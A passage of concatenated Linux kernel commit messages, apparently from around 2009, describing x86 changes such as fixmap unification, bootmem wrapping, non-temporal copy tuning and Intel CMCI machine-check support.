return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
The virtually mapped percpu space causes us two problems:
- for hypercalls which take an mfn, we need to do a full pagetable
walk to convert the percpu va into an mfn, and
- when a hypercall requires a page to be mapped RO via all its aliases,
we need to make sure its RO in both the percpu mapping and in the
linear mapping
This primarily affects the gdt and the vcpu info structure.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Cc: Xen-devel <xen-devel@lists.xensource.com>
Cc: Gerd Hoffmann <kraxel@redhat.com>
Cc: Rusty Russell <rusty@rustcorp.com.au>
Cc: Tejun Heo <htejun@gmail.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Its the correct thing to do before using the struct in a prototype.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
With x86-32 and -64 using the same mechanism for managing the
tss io permissions bitmap, large chunks of process*.c are
trivially unifyable, including:
- exit_thread
- flush_thread
- __switch_to_xtra (along with tsc enable/disable)
and as bonus pickups:
- sys_fork
- sys_vfork
(Note: asmlinkage expands to empty on x86-64)
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: remove 32-bit optimization to prepare unification
x86-32 and -64 differ in the way they context-switch tasks
with io permission bitmaps. x86-64 simply copies the next
tasks io bitmap into place (if any) on context switch. x86-32
invalidates the bitmap on context switch, so that the next
IO instruction will fault; at that point it installs the
appropriate IO bitmap.
This makes context switching IO-bitmap-using tasks a bit more
less expensive, at the cost of making the next IO instruction
slower due to the extra fault. This tradeoff only makes sense
if IO-bitmap-using processes are relatively common, but they
don't actually use IO instructions very often.
However, in a typical desktop system, the only process likely
to be using IO bitmaps is the X server, and nothing at all on
a server. Therefore the lazy context switch doesn't really win
all that much, and its just a gratuitious difference from
64-bit code.
This patch removes the lazy context switch, with a view to
unifying this code in a later change.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: standardize IO on cached ops
On modern CPUs it is almost always a bad idea to use non-temporal stores,
as the regression in this commit has shown it:
30d697f: x86: fix performance regression in write() syscall
The kernel simply has no good information about whether using non-temporal
stores is a good idea or not - and trying to add heuristics only increases
complexity and inserts fragility.
The regression on cached write()s took very long to be found - over two
years. So dont take any chances and let the hardware decide how it makes
use of its caches.
The only exception is drivers/gpu/drm/i915/i915_gem.c: there were we are
absolutely sure that another entity (the GPU) will pick up the dirty
data immediately and that the CPU will not touch that data before the
GPU will.
Also, keep the _nocache() primitives to make it easier for people to
experiment with these details. There may be more clear-cut cases where
non-cached copies can be used, outside of filemap.c.
Cc: Salman Qazi <sqazi@google.com>
Cc: Nick Piggin <npiggin@suse.de>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
This reverts commit 17581ad812.
Sitsofe Wheeler reported that /dev/dri/card0 is MIA on his EeePC 900
and bisected it to this commit.
Graphics card is an i915 in an EeePC 900:
00:02.0 VGA compatible controller [0300]:
Intel Corporation Mobile 915GM/GMS/910GML
Express Graphics Controller [8086:2592] (rev 04)
( Most likely the ioremap() of the driver failed and hence the card
did not initialize. )
Reported-by: Sitsofe Wheeler <sitsofe@yahoo.com>
Bisected-by: Sitsofe Wheeler <sitsofe@yahoo.com>
Cc: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: fix new breakages introduced by previous fix
Commit c132937556 tried to clean up
bootmem arch wrapper but it wasn't quite correct. Before the commit,
the followings were broken.
* Low level interface functions prefixed with __ ignored arch
preference.
* reserve_bootmem(...) can't be mapped into
reserve_bootmem_node(NODE_DATA(0)->bdata, ...) because the node is
not preference here. The region specified MUST fall into the
specified region; otherwise, it will panic.
After the commit,
* If allocation fails for the arch preferred node, it should fallback
to whatever is available. Instead, it simply failed allocation.
There are too many internal details to allow generic wrapping and
still keep things simple for archs. Plus, all that arch wants is a
way to prefer certain node over another.
This patch drops the generic wrapping around alloc_bootmem_core() and
add alloc_bootmem_core() instead. If necessary, arch can define
bootmem_arch_referred_node() macro or function which takes all
allocation information and returns the preferred node. bootmem
generic code will always try the preferred node first and then
fallback to other nodes as usual.
Breakages noted and changes reviewed by Johannes Weiner.
Signed-off-by: Tejun Heo <tj@kernel.org>
Acked-by: Johannes Weiner <hannes@cmpxchg.org>
Impact: unification
This patch unify fixmap_32.h and fixmap_64.h into fixmap.h.
Things that we can't merge now are using CONFIG_X86_{32,64}
(e.g.:vsyscall and EFI)
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: cleanup
Just prepare fixmap for later mechanic unification.
No real modification on code.
text data bss dec hex filename
3831152 353188 372736 4557076 458914 vmlinux-32.after
3831152 353188 372736 4557076 458914 vmlinux-32.before
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: cleanup
Just prepare fixmap for later mechanic unification.
No real modification on code.
text data bss dec hex filename
4312362 527192 421924 5261478 5048a6 vmlinux-64.after
4312362 527192 421924 5261478 5048a6 vmlinux-64.before
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: new fixmap allocation
FIX_EFI_IO_MAP_FIRST_PAGE is used only when EFI is enabled.
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: New fixmap allocations
Add CONFIG_X86_{LOCAL,IO}_APIC to enum fixed_address.
FIX_APIC_BASE is used only when CONFIG_X86_LOCAL_APIC is
enabled and FIX_IO_APIC_BASE_* are used only when
CONFIG_X86_IO_APIC is enabled.
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: new interface (not yet use)
Define reserve_top_address for x86_64; only for later x86 integration.
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: new interface, not yet used
Now, with these macros, x86_64 code can know where start the
permanent and non-permanent fixed mapped address.
This patch make these macros equal fixmap_32.h for future
x86 integration.
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: rename
Rename __FIXADDR_SIZE to FIXADDR_SIZE
and __FIXADDR_BOOT_SIZE to FIXADDR_BOOT_SIZE.
Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br>
Acked-by: Glauber Costa <gcosta@redhat.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: cleanup
- rename apic->wakeup_cpu to apic->wakeup_secondary_cpu, to
make it apparent that this is an SMP-only method
- handle NULL ->wakeup_secondary_cpus to mean the default INIT
wakeup sequence - this allows simplification of the APIC
driver templates.
Cc: Yinghai Lu <yinghai@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: build fix
wakeup_secondary_cpu_via_init(), the default platform method for
booting a secondary CPU, is always used on UP due to probe_32.c,
if CONFIG_X86_LOCAL_APIC is enabled but SMP is off.
So provide a UP wrapper inline as well.
Cc: Yinghai Lu <yinghai@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
that is only needed when CONFIG_X86_VSMP is defined with 64bit
also remove dead code about PCI, because CONFIG_X86_VSMP depends on PCI
Signed-off-by: Yinghai Lu <yinghai@kernel.org>
Cc: Ravikiran Thirumalai <kiran@scalex86.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
x86_quirks->update_apic() calling looks crazy. so try to remove it:
1. every apic take wakeup_cpu member directly
2. separate es7000_apic to es7000_apic_cluster
3. use uv_wakeup_cpu directly
Signed-off-by: Yinghai Lu <yinghai@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Make io_mapping_create_wc and io_mapping_free go through PAT to make sure
that there are no memory type aliases.
Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Dave Airlie <airlied@redhat.com>
Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
Cc: Eric Anholt <eric@anholt.net>
Cc: Keith Packard <keithp@keithp.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
io_mapping_create_wc should take a resource_size_t parameter in place of
unsigned long. With unsigned long, there will be no way to map greater than 4GB
address in i386/32 bit.
On x86, greater than 4GB addresses cannot be mapped on i386 without PAE. Return
error for such a case.
Patch also adds a structure for io_mapping, that saves the base, size and
type on HAVE_ATOMIC_IOMAP archs, that can be used to verify the offset on
io_mapping_map calls.
Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Dave Airlie <airlied@redhat.com>
Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
Cc: Eric Anholt <eric@anholt.net>
Cc: Keith Packard <keithp@keithp.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Add a function to check and keep identity maps in sync, when changing
any memory type. One of the follow on patches will also use this
routine.
Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Dave Airlie <airlied@redhat.com>
Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
Cc: Eric Anholt <eric@anholt.net>
Cc: Keith Packard <keithp@keithp.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: make more types of copies non-temporal
This change makes the following simple fix:
30d697f: x86: fix performance regression in write() syscall
A bit more sophisticated: we check the 'total' number of bytes
written to decide whether to copy in a cached or a non-temporal
way.
This will for example cause the tail (modulo 4096 bytes) chunk
of a large write() to be non-temporal too - not just the page-sized
chunks.
Cc: Salman Qazi <sqazi@google.com>
Cc: Nick Piggin <npiggin@suse.de>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup, enable future change
Add a 'total bytes copied' parameter to __copy_from_user_*nocache(),
and update all the callsites.
The parameter is not used yet - architecture code can use it to
more intelligently decide whether the copy should be cached or
non-temporal.
Cc: Salman Qazi <sqazi@google.com>
Cc: Nick Piggin <npiggin@suse.de>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
http://bugzilla.kernel.org/show_bug.cgi?id=10968
[ Updated for current tree, and fixed compile failure
when p4-clockmod was built modular -- davej]
From: Matthias-Christian Ott <ott@mirix.org>
Signed-off-by: Dominik Brodowski <linux@brodo.de>
Signed-off-by: Dave Jones <davej@redhat.com>
Impact: cleanup
Unused macro parameters cause spurious unused variable warnings.
Convert all cacheflush macros to inline functions to avoid the
warnings and achieve better type checking.
Signed-off-by: Tejun Heo <tj@kernel.org>
Impact: Major new feature
Intel CMCI (Corrected Machine Check Interrupt) is a new
feature on Nehalem CPUs. It allows the CPU to trigger
interrupts on corrected events, which allows faster
reaction to them instead of with the traditional
polling timer.
Also use CMCI to discover shared banks. Machine check banks
can be shared by CPU threads or even cores. Using the CMCI enable
bit it is possible to detect the fact that another CPU already
saw a specific bank. Use this to assign shared banks only
to one CPU to avoid reporting duplicated events.
On CPU hot unplug bank sharing is re discovered. This is done
using a thread that cycles through all the CPUs.
To avoid races between the poller and CMCI we only poll
for banks that are not CMCI capable and only check CMCI
owned banks on a interrupt.
The shared banks ownership information is currently only used for
CMCI interrupts, not polled banks.
The sharing discovery code follows the algorithm recommended in the
IA32 SDM Vol3a 14.5.2.1
The CMCI interrupt handler just calls the machine check poller to
pick up the machine check event that caused the interrupt.
I decided not to implement a separate threshold event like
the AMD version has, because the threshold is always one currently
and adding another event didn't seem to add any value.
Some code inspired by Yunhong Jiang's Xen implementation,
which was in term inspired by a earlier CMCI implementation
by me.
Signed-off-by: Andi Kleen <ak@linux.intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: New register definitions only
CMCI means support for raising an interrupt on a corrected machine
check event instead of having to poll for it. It's a new feature in
Intel Nehalem CPUs available on some machine check banks.
For details see the IA32 SDM Vol3a 14.5
Define the registers for it as a preparation for further patches.
Signed-off-by: Andi Kleen <ak@linux.intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Define a per cpu bitmap that contains the banks polled by the machine
check poller. This is needed for the CMCI code in the next patches
to be able to disable polling on specific banks.
The bank by default contains all banks, so there is no behaviour
change. Only future code will remove some banks from the polling
set.
Signed-off-by: Andi Kleen <ak@linux.intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: cleanup; preparation for feature
The mce_amd_64 code has an own private MC threshold vector with an own
interrupt handler. Since Intel needs a similar handler
it makes sense to share the vector because both can not
be active at the same time.
I factored the common APIC handler code into a separate file which can
be used by both the Intel or AMD MC code.
This is needed for the next patch which adds an Intel specific
CMCI handler.
This patch should be a nop for AMD, it just moves some code
around.
Signed-off-by: Andi Kleen <ak@linux.intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: Cleanup (code movement)
Move MAX_NR_BANKS into mce.h because it's needed there
for followup patches.
Signed-off-by: Andi Kleen <ak@linux.intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
While the introduction of __copy_from_user_nocache (see commit:
0812a579c9) may have been an improvement
for sufficiently large writes, there is evidence to show that it is
deterimental for small writes. Unixbench's fstime test gives the
following results for 256 byte writes with MAX_BLOCK of 2000:
2.6.29-rc6 ( 5 samples, each in KB/sec ):
283750, 295200, 294500, 293000, 293300
2.6.29-rc6 + this patch (5 samples, each in KB/sec):
313050, 3106750, 293350, 306300, 307900
2.6.18
395700, 342000, 399100, 366050, 359850
See w_test() in src/fstime.c in unixbench version 4.1.0. Basically, the above test
consists of counting how much we can write in this manner:
alarm(10);
while (!sigalarm) {
for (f_blocks = 0; f_blocks < 2000; ++f_blocks) {
write(f, buf, 256);
}
lseek(f, 0L, 0);
}
Note, there are other components to the write syscall regression
that are not addressed here.
Signed-off-by: Salman Qazi <sqazi@google.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: minor change to populate_extra_pte() and addition of pmd flavor
Update populate_extra_pte() to return pointer to the pte_t for the
specified address and add populate_extra_pmd() which only populates
till the pmd and returns pointer to the pmd entry for the address.
For 64bit, pud/pmd/pte fill functions are separated out from
set_pte_vaddr[_pud]() and used for set_pte_vaddr[_pud]() and
populate_extra_{pte|pmd}().
Signed-off-by: Tejun Heo <tj@kernel.org>
Impact: cleaner and consistent bootmem wrapping
By setting CONFIG_HAVE_ARCH_BOOTMEM_NODE, archs can define
arch-specific wrappers for bootmem allocation. However, this is done
a bit strangely in that only the high level convenience macros can be
changed while lower level, but still exported, interface functions
can't be wrapped. This not only is messy but also leads to strange
situation where alloc_bootmem() does what the arch wants it to do but
the equivalent __alloc_bootmem() call doesn't although they should be
able to be used interchangeably.
This patch updates bootmem such that archs can override / wrap the
backend function - alloc_bootmem_core() instead of the highlevel
interface functions to allow simpler and consistent wrapping. Also,
HAVE_ARCH_BOOTMEM_NODE is renamed to HAVE_ARCH_BOOTMEM.
Signed-off-by: Tejun Heo <tj@kernel.org>
Cc: Johannes Weiner <hannes@saeurebad.de>